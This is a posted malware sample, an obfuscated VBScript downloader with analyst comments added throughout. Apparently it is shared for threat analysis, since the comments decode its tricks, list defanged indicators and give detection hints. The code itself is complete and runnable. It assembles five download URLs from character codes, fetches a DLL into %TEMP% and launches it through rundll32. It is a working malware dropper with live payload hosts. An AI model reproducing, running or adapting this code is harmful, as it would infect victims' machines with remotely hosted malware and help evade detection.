dynamoo

Malicious script

Nov 7th, 2016
  ' Analyst note: runtime errors are suppressed at script level, so a failed step does not
  ' surface an error dialog; the main body checks Err.Number explicitly where it cares.
  1. On Error Resume Next
  ' Only ECi1q9j5n6t2 (2) is referenced in this listing: it is passed as the iomode argument of
  ' FileSystemObject.OpenTextFile (2 = ForWriting). The other two names are never used here.
  2. Const Rv5h5i0k5p4 = 1, ECi1q9j5n6t2 = 2, Nl0r5e4i0g5 = 8
  ' Jv0x6w7t6c3 (2) is assigned to ADODB.Stream .type (2 = adTypeText), QZf6c8u7l5f0 ("437") to
  ' .Charset, and BXh8q2v4w5z5 (2) is the SaveToFile option (2 = adSaveCreateOverWrite).
  ' Tf5d1h8l8w8 is not referenced in this listing.
  3. Const Tf5d1h8l8w8 = 1, Jv0x6w7t6c3 = 2, QZf6c8u7l5f0 = "437", BXh8q2v4w5z5 = 2
  ' Reads the file named by Fv9e9y4c1g9 as text through an ADODB.Stream (type 2, charset "437")
  ' and returns the result of RVu2q1z1c0a7 applied to that text.
  ' Analyst note: RVu2q1z1c0a7 is not defined anywhere in this listing and this function is not
  ' called by the main body below, so it appears to be unused generator leftovers - confirm
  ' against the full sample. The ProgID is split ("ADO"&"DB.Stream") to defeat plain string matching.
  4. Function Bl4t5r0i1e9(Fv9e9y4c1g9)
  ' At9i4m5e3u5 is declared but never used in this function.
  5. Dim Xt8o8f7y3d6, At9i4m5e3u5, Xw9n5b2r3s3
  6. Set Xt8o8f7y3d6 = CreateObject("ADO"&"DB.Stream")
  7. Xt8o8f7y3d6.type = Jv0x6w7t6c3
  8. Xt8o8f7y3d6.Charset = QZf6c8u7l5f0
  9. Xt8o8f7y3d6.Open
  10. Xt8o8f7y3d6.LoadFromFile Fv9e9y4c1g9
  11. Xw9n5b2r3s3 = Xt8o8f7y3d6.ReadText
  12. Xt8o8f7y3d6.Close
  13. Bl4t5r0i1e9 = RVu2q1z1c0a7(Xw9n5b2r3s3)
  14. End Function
  ' Writes Sk7x2y6a5a6 to the file Fv9e9y4c1g9 through an ADODB.Stream (type 2, charset "437"),
  ' after passing it through Mh3x8t2w7s4; SaveToFile uses option 2 (create or overwrite).
  ' Analyst note: Mh3x8t2w7s4 is not defined in this listing and the Sub is not called by the
  ' main body below - it looks like an unused counterpart of Bl4t5r0i1e9; confirm against the
  ' full sample.
  15. Sub Lh3s4l5l8e0(Fv9e9y4c1g9, Sk7x2y6a5a6)
  16. Dim Xt8o8f7y3d6, Xw9n5b2r3s3
  17. Set Xt8o8f7y3d6 = CreateObject("AD"&"ODB.Stream")
  18. Xt8o8f7y3d6.type = Jv0x6w7t6c3
  19. Xt8o8f7y3d6.Charset = QZf6c8u7l5f0
  20. Xt8o8f7y3d6.Open
  21. Xw9n5b2r3s3 = Mh3x8t2w7s4(Sk7x2y6a5a6)
  22. Xt8o8f7y3d6.WriteText Xw9n5b2r3s3
  23. Xt8o8f7y3d6.SaveToFile Fv9e9y4c1g9, BXh8q2v4w5z5
  24. Xt8o8f7y3d6.Close
  25. End Sub
  ' Returns an array with Bn5k1c7z6z5 elements; used in this listing only by BCr1v0l5c8g5 to
  ' size a buffer for an HTTP response body.
  ' Raises error 50001 (description "qqqq") when the requested size is zero or negative.
  26. Function Gy2r4m8v9v6(Bn5k1c7z6z5)
  27. Dim Xw9n5b2r3s3, IKr9a2y0a5j9(0)
  28. If Bn5k1c7z6z5 <= 0 Then
  29. Err.Raise 50001, "", "qqqq", "", 0
  30. ElseIf Bn5k1c7z6z5 = 1 Then
  ' Size 1: return the fixed one-element array declared above.
  31. Gy2r4m8v9v6 = IKr9a2y0a5j9
  32. Else
  ' Splitting a string of (n-1) spaces on " " yields n empty strings, i.e. an n-element array.
  33. Xw9n5b2r3s3 = Space(Bn5k1c7z6z5-1)
  34. Gy2r4m8v9v6 = Split(Xw9n5b2r3s3, " ")
  35. End If
  36. End Function
  ' Performs a synchronous HTTP GET of the URL in Fk9j1v0p7l3 and returns the response body as
  ' an array of byte values.
  ' Analyst note: this function is not called by the main body in this listing (the download
  ' path actually used is Nz7k3t7g3a1). The HTTP client ProgIDs and the verb are split into
  ' concatenated fragments to defeat plain string matching; "If 8=8" is an always-true filler.
  37. Function BCr1v0l5c8g5(Fk9j1v0p7l3)
  38. Dim Iz3v0l3j1a1, HUh0i1z9q7g4, At9i4m5e3u5, JWw7w5w3u6o8
  39. Dim YHp5y6z3v4q4, KUd3g8r1s6v2(1)
  ' The FileSystemObject is created but never used in this function.
  40. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  ' Candidate HTTP clients, tried in order: WinHttp.WinHttpRequest.5.1, then MSXML2.XMLHTTP.
  41. KUd3g8r1s6v2(0) = "WinHttp.WinH"&"ttpRequest.5.1"
  42. KUd3g8r1s6v2(1) = "MSXML2.XML"&"HTTP"
  43. For Each YHp5y6z3v4q4 in KUd3g8r1s6v2
  44. Err.Clear
  45. Set HUh0i1z9q7g4 = CreateObject(YHp5y6z3v4q4)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
  50. If 8=8 Then
  ' Third argument False = synchronous request.
  51. HUh0i1z9q7g4.Open "GE"&"T", Fk9j1v0p7l3, False
  52. End If
  53. HUh0i1z9q7g4.Send
  ' Allocate one array slot per response byte, then copy the body byte by byte.
  54. At9i4m5e3u5 = Gy2r4m8v9v6(LenB(HUh0i1z9q7g4.ResponseBody))
  55. For JWw7w5w3u6o8 = 1 To LenB(HUh0i1z9q7g4.ResponseBody)
  56. At9i4m5e3u5(JWw7w5w3u6o8-1) = AscB(MidB(HUh0i1z9q7g4.ResponseBody, JWw7w5w3u6o8, 1))
  57. Next
  58. BCr1v0l5c8g5 = At9i4m5e3u5
  59. End Function
  ' Download routine used by the main body: fetches the URL Cm7n0l9x9v5 with
  ' WinHttp.WinHttpRequest.5.1 and writes the response body to FYc9e1v7b1e0.
  ' Analyst notes (defensive):
  '  - The response is accepted only if it is between 100000 and 250000 bytes; anything else
  '    raises error 50011, which the main body treats as "quit". That size window is a useful
  '    triage hint for the expected payload.
  '  - The output file is opened for writing (created if missing) BEFORE the request is sent,
  '    so a rejected or failed download can still leave an empty file at the target path.
  60. Sub Nz7k3t7g3a1( Cm7n0l9x9v5, FYc9e1v7b1e0 )
  61. Dim JWw7w5w3u6o8, IEi1c2a1a8u2, Iz3v0l3j1a1, HUh0i1z9q7g4, Kk0o3l9i3m1
  62. Set Iz3v0l3j1a1 = CreateObject( "Scrip"&"ting.FileSystemObject" )
  ' Resolve the output path: an existing folder gets the last URL path segment appended;
  ' otherwise the argument is used as a full file path if its parent folder exists.
  63. If Iz3v0l3j1a1.FolderExists( FYc9e1v7b1e0 ) Then
  64. Kk0o3l9i3m1 = Iz3v0l3j1a1.BuildPath( FYc9e1v7b1e0, Mid( Cm7n0l9x9v5, InStrRev( Cm7n0l9x9v5, "/" ) + 1 ) )
  65. ElseIf Iz3v0l3j1a1.FolderExists( Left( FYc9e1v7b1e0, InStrRev( FYc9e1v7b1e0, "\" ) - 1 ) ) Then
  66. Kk0o3l9i3m1 = FYc9e1v7b1e0
  67. Else
  68. Exit Sub
  69. End If
  ' iomode 2 (ForWriting), create = True.
  70. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.OpenTextFile( Kk0o3l9i3m1, ECi1q9j5n6t2, True )
  71. Set HUh0i1z9q7g4 = CreateObject( "WinHttp.WinHttp"&"Request.5.1" )
  ' Synchronous GET (third argument False); the verb is split as "G"&"ET".
  72. HUh0i1z9q7g4.Open "G"&"ET", Cm7n0l9x9v5, False
  73. HUh0i1z9q7g4.Send
  74. If LenB(HUh0i1z9q7g4.ResponseBody) < 100000 Or LenB(HUh0i1z9q7g4.ResponseBody) > 250000 Then
  ' NOTE(review): this Sub has no error handler of its own, so the raise presumably ends the
  ' Sub with Err set for the caller's Err.Number check, making the Exit Sub unreachable - confirm.
  75. Err.Raise 50011, "", "qqqq", "", 0
  76. Exit Sub
  77. End If
  ' Write the body one byte at a time, each byte converted to a character with Chr().
  78. For JWw7w5w3u6o8 = 1 To LenB( HUh0i1z9q7g4.ResponseBody )
  79. IEi1c2a1a8u2.Write Chr( AscB( MidB( HUh0i1z9q7g4.ResponseBody, JWw7w5w3u6o8, 1 ) ) )
  80. Next
  ' "If 8=8" is an always-true filler around the Close call.
  81. If 8=8 Then
  82. IEi1c2a1a8u2.Close( )
  83. End If
  84. End Sub
  ' Returns the full path of the rundll32.exe that Xd4l3m8o1v8 will launch.
  ' The Chr() sequence on the CreateObject line decodes to "WScript.Shell".
  ' Analyst note: the architecture comparison string is Chr(97) & "md6" & Chr(34). Chr(34) is a
  ' double quote, not "4", so the string is amd6" and cannot equal a lower-cased
  ' PROCESSOR_ARCHITECTURE value of "amd64". As written, the Else branch is taken and the
  ' function returns %SystemRoot%\system32\rundll32.exe; the SysWOW64 branch is not reached.
  85. Function Pv0a8n6g5v4()
  86. Dim EZf5v6c8r2a8, Jd3q5u3r2z0, FMw4p1c2u1x5
  87. Set EZf5v6c8r2a8 = CreateObject(Chr(87)+Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
  ' "If 8=8" is an always-true filler.
  88. If 8=8 Then
  89. Set Jd3q5u3r2z0 = EZf5v6c8r2a8.Environment("System")
  90. End If
  91. FMw4p1c2u1x5 = Jd3q5u3r2z0("PROCESSOR_"&"ARCHITECTURE")
  92. If LCase(FMw4p1c2u1x5) = Chr(97) & "md6"& Chr(34) Then
  93. Pv0a8n6g5v4 = EZf5v6c8r2a8.ExpandEnvironmentStrings("%SystemRoot%\Sy"&"sWOW64\rundll32.e"&"xe")
  94. Else
  95. Pv0a8n6g5v4 = EZf5v6c8r2a8.ExpandEnvironmentStrings("%SystemRoot"&"%\system32\rundll32.e"&"xe")
  96. End If
  97. End Function
  ' Execution stage: builds the command line
  '   <rundll32 path> <8.3 short path of Vh9n6b5o9t6>,<LAi2q6i0o9v5> <Eq1t0n9v2y8>
  ' and starts it with WScript.Shell.Run.
  ' Analyst note (detection): the observable behaviour is a script host process spawning
  ' rundll32.exe with a DLL given by its 8.3 short path; the main body passes a file under
  ' %TEMP%, the export name "bbb" and the argument "417".
  98. Sub Xd4l3m8o1v8(Vh9n6b5o9t6, LAi2q6i0o9v5, Eq1t0n9v2y8)
  99. Dim EZf5v6c8r2a8, Iz3v0l3j1a1, IEi1c2a1a8u2, WKw2a7v0n6q7, WXm6i4u5t3c8
  100. Set EZf5v6c8r2a8 = CreateObject("WScr"&"ipt"&".S"&"hell")
  101. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  ' GetFile requires the file to exist; its ShortPath is the 8.3 form of the path.
  102. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.GetFile(Vh9n6b5o9t6)
  103. WKw2a7v0n6q7 = IEi1c2a1a8u2.ShortPath
  104. WXm6i4u5t3c8 = Pv0a8n6g5v4() + " " + WKw2a7v0n6q7 + "," + LAi2q6i0o9v5 + " " + Eq1t0n9v2y8
  ' "If 8=8" is an always-true filler around the process launch.
  105. If 8=8 Then
  106. EZf5v6c8r2a8.Run(WXm6i4u5t3c8)
  107. End If
  108. End Sub
  ' Thin wrapper: returns FileSystemObject.FileExists for the path Vh9n6b5o9t6.
  ' The main body uses it to test for the dropped DLL and for its ".txt" marker file.
  109. Function Ad4b1n4q7z5(Vh9n6b5o9t6)
  110. Dim Iz3v0l3j1a1
  111. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  112. Ad4b1n4q7z5 = Iz3v0l3j1a1.FileExists(Vh9n6b5o9t6)
  113. End Function
  ' Returns the 8.3 short path of the existing file Vh9n6b5o9t6 (FileSystemObject.GetFile().ShortPath).
  ' The main body appends ".txt" to this value to form the marker-file path it checks.
  114. Function Zx4v2w0r4u0(Vh9n6b5o9t6)
  115. Dim Iz3v0l3j1a1, IEi1c2a1a8u2
  116. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  117. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.GetFile(Vh9n6b5o9t6)
  118. Zx4v2w0r4u0 = IEi1c2a1a8u2.ShortPath
  119. End Function
  ' Floating-point remainder: returns Rq2b7l1n2y6 - Int(Rq2b7l1n2y6 / TZd1g6d1o3r2) * TZd1g6d1o3r2,
  ' with every operand converted to Double. Used in this listing only by Md2j7u6u1i0.
  120. Function Re8a1r0o6e1(Rq2b7l1n2y6, TZd1g6d1o3r2)
  121. Dim Bn5k1c7z6z5
  122. Bn5k1c7z6z5 = CDbl(Int(CDbl(Rq2b7l1n2y6)/CDbl(TZd1g6d1o3r2)))
  123. Re8a1r0o6e1 = CDbl(Rq2b7l1n2y6) - Bn5k1c7z6z5 * CDbl(TZd1g6d1o3r2)
  124. End Function
  ' Pseudo-random integer generator over a three-element state array Xw9n5b2r3s3.
  ' Each element is advanced by its own multiplier/modulus pair (171/30269, 172/30307,
  ' 170/30323), the three ratios are summed and reduced modulo 1.0, and the result is scaled
  ' by Zz7v7s1x7d5 and truncated. These are the Wichmann-Hill generator constants.
  ' Analyst note: nothing in this listing calls this function; the three-element array seeded
  ' in the main body (14413, 15337, 15163) is presumably its intended state - confirm.
  125. Function Md2j7u6u1i0(Zz7v7s1x7d5, Xw9n5b2r3s3)
  126. Xw9n5b2r3s3(1) = 172 * Xw9n5b2r3s3(1) Mod 30307
  127. Xw9n5b2r3s3(0) = 171 * Xw9n5b2r3s3(0) Mod 30269
  128. Xw9n5b2r3s3(2) = 170 * Xw9n5b2r3s3(2) Mod 30323
  129. Dim Od5t0s3j9r6
  130. Od5t0s3j9r6 = Re8a1r0o6e1((CDbl(Xw9n5b2r3s3(0))/30269.0 + CDbl(Xw9n5b2r3s3(1))/30307.0 + CDbl(Xw9n5b2r3s3(2))/30323.0), 1.0)
  131. Md2j7u6u1i0 = Int(Od5t0s3j9r6 * CDbl(Zz7v7s1x7d5))
  132. End Function
  ' Returns SDs8s0h3q2t3 * Rnd() converted with CInt (which rounds rather than truncates).
  ' The main body calls it with UBound of the five-entry URL array, so the result is used as
  ' an index into that array to pick one download URL per run.
  133. Function NHi6u0v5e9c1(SDs8s0h3q2t3)
  134. NHi6u0v5e9c1 = CInt(SDs8s0h3q2t3*Rnd())
  135. End Function
  ' Thin wrapper around WScript.Sleep (argument in milliseconds).
  ' Not called anywhere in this listing.
  136. Sub MRc3u4f8f1p5(Qe7z5e4c3o0)
  137. WScript.Sleep(Qe7z5e4c3o0)
  138. End Sub
  ' Thin wrapper around WScript.Quit: ends the script with exit code Nk9k2y9e6s1.
  ' The main body calls it with 1 right after launching rundll32, and with 0 after the loop.
  139. Sub TSa5t4w9r4j5(Nk9k2y9e6s1)
  140. WScript.Quit(Nk9k2y9e6s1)
  141. End Sub
  ' Main body of the downloader. Summary for triage:
  '  1. Picks one of five hard-coded HTTP URLs at random.
  '  2. Downloads it to %TEMP%\Z6uBMrbyqhs<digit>.dll (size must be 100000-250000 bytes).
  '  3. Launches it as: rundll32.exe <short path of the DLL>,bbb 417
  '  4. Quits. If the DLL and a "<short path>.txt" marker already exist, it quits without acting.
  ' Indicators decoded from the string concatenations below (defanged):
  '   hxxp://coachatelier[.]nl/lg8s2
  '   hxxp://bechsautomobiler[.]dk/m8idi9j
  '   hxxp://desertkingwaterproofing[.]com/ma4562
  '   hxxp://zapashydro[.]net/6sgto2bd
  '   hxxp://owkcon[.]com/6xgohg6i
  '   File: %TEMP%\Z6uBMrbyqhs0.dll (see the loop note below), marker: <short path>.txt
  ' Randomize seeds Rnd(), which NHi6u0v5e9c1 uses to choose the URL.
  142. Randomize
  143. Dim DZe6j2w7j5r8(2), Qt5h4g3u5j2, ALo0k4j3l5o6(4), Fv9e9y4c1g9
  ' Three seed values and Qt5h4g3u5j2 are set but never read again in this listing.
  144. DZe6j2w7j5r8(0)=0+14413
  145. DZe6j2w7j5r8(1)=0+15337
  146. DZe6j2w7j5r8(2)=0+15163
  147. Qt5h4g3u5j2 = 1
  ' Each URL is assembled from single characters and Chr() codes so that no URL appears as a
  ' literal string in the file; the decoded values are listed in the header comment above.
  148. ALo0k4j3l5o6(0) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "c" & chR(111) & "a" & chR(99) & "h" & "a" & "t" & "e" & "l" & "i" & "e" & "r" & chR(46) & "n" & "l" & "/" & "l" & "g" & "8" & "s" & "2"
  149.  
  150. ALo0k4j3l5o6(1) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "b" & chR(101) & "c" & "h" & "s" & "a" & "u" & "t" & "o" & "m" & "o" & "b" & "i" & "l" & "e" & "r" & "." & chR(100) & "k" & chR(47) & "m" & chR(56) & "i" & "d" & "i" & "9" & "j"
  151.  
  152. ALo0k4j3l5o6(2) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "d" & "e" & "s" & "e" & "r" & "t" & "k" & chR(105) & "n" & "g" & "w" & "a" & "t" & "e" & "r" & chR(112) & "r" & "o" & "o" & "f" & "i" & chR(110) & "g" & "." & chR(99) & "o" & "m" & "/" & "m" & "a" & "4" & "5" & "6" & "2"
  153.  
  154. ALo0k4j3l5o6(3) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ chR(122) & "a" & "p" & "a" & "s" & "h" & "y" & "d" & "r" & "o" & "." & "n" & "e" & "t" & "/" & "6" & chR(115) & "g" & chR(116) & "o" & "2" & "b" & "d"
  155.  
  156. ALo0k4j3l5o6(4) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "o" & "w" & "k" & "c" & "o" & "n" & "." & "c" & "o" & "m" & "/" & "6" & "x" & "g" & "o" & "h" & "g" & "6" & "i"
  157.  
  ' Base name of the dropped file; a digit and ".dll" are appended inside the loop.
  158. Fv9e9y4c1g9 = "Z6uBMrbyqhs"
  159. Dim EZf5v6c8r2a8, IVr6o1p3r6l7, VKq6s6r7i0o2, LZe1c7b8o0k2, Qe7z5e4c3o0, HFt4k4c2m5r4
  ' The shell object is stored in objShell, which is not among the Dim'd names; it is used
  ' only to expand %TEMP%.
  160. Set objShell = CreateObject("WS"&"cript.S"&"hell")
  161. IVr6o1p3r6l7 = objShell.ExpandEnvironmentStrings("%" & "T"&"EM"&"P%")
  162. HFt4k4c2m5r4 = "txt"
  163. Dim Jz3j8p0i0l9, PZy6t5m4r1m5, STk3e6y8i6d0, Nw0q9o9m6w1, JWw7w5w3u6o8
  ' PZy6t5m4r1m5 is the "already downloaded" flag.
  164. PZy6t5m4r1m5 = False
  ' The loop is written for digits 0..5, but the last statement of the body quits the script,
  ' so in this listing only the first iteration (digit "0") can run.
  165. For JWw7w5w3u6o8=0 To 5
  ' Target path: %TEMP%\Z6uBMrbyqhs<digit>.dll, with Chr(48+i) giving the digit character.
  166. VKq6s6r7i0o2 = IVr6o1p3r6l7 & "\" + Fv9e9y4c1g9 + Chr(48+JWw7w5w3u6o8) + "."+"d"&"l"+"l"
  ' Re-run guard: if the DLL and "<short path>.txt" both exist, exit without doing anything.
  ' Nothing in this script creates the .txt file, so it is presumably written by the DLL - confirm.
  167. If Ad4b1n4q7z5(VKq6s6r7i0o2) Then
  168. LZe1c7b8o0k2 = Zx4v2w0r4u0(VKq6s6r7i0o2) & "." + HFt4k4c2m5r4
  169. If Ad4b1n4q7z5(LZe1c7b8o0k2) Then
  170. WScript.Quit(0)
  171. End If
  172. End If
  173. If Not PZy6t5m4r1m5 Then
  ' One URL is chosen at random and downloaded; any error (including the size check in
  ' Nz7k3t7g3a1) ends the script with exit code 0 and no other URL is tried.
  174. Jz3j8p0i0l9 = NHi6u0v5e9c1(UBound(ALo0k4j3l5o6))
  175. Nz7k3t7g3a1 ALo0k4j3l5o6(Jz3j8p0i0l9), VKq6s6r7i0o2
  176. If Err.Number <> 0 Then
  177. WScript.Quit(0)
  178. End If
  179. PZy6t5m4r1m5 = True
  180. End If
  ' Run the downloaded DLL through rundll32 with export name "bbb" and argument "417",
  ' then quit with exit code 1.
  181. Xd4l3m8o1v8 VKq6s6r7i0o2, "bb"&"b", "41"&"7"
  182. TSa5t4w9r4j5 1
  183. Next
  ' "If 8=8" is an always-true filler; this final quit is reached only if the quit inside the
  ' loop did not end the script.
  184. If 8=8 Then
  185. TSa5t4w9r4j5 0
  186. End If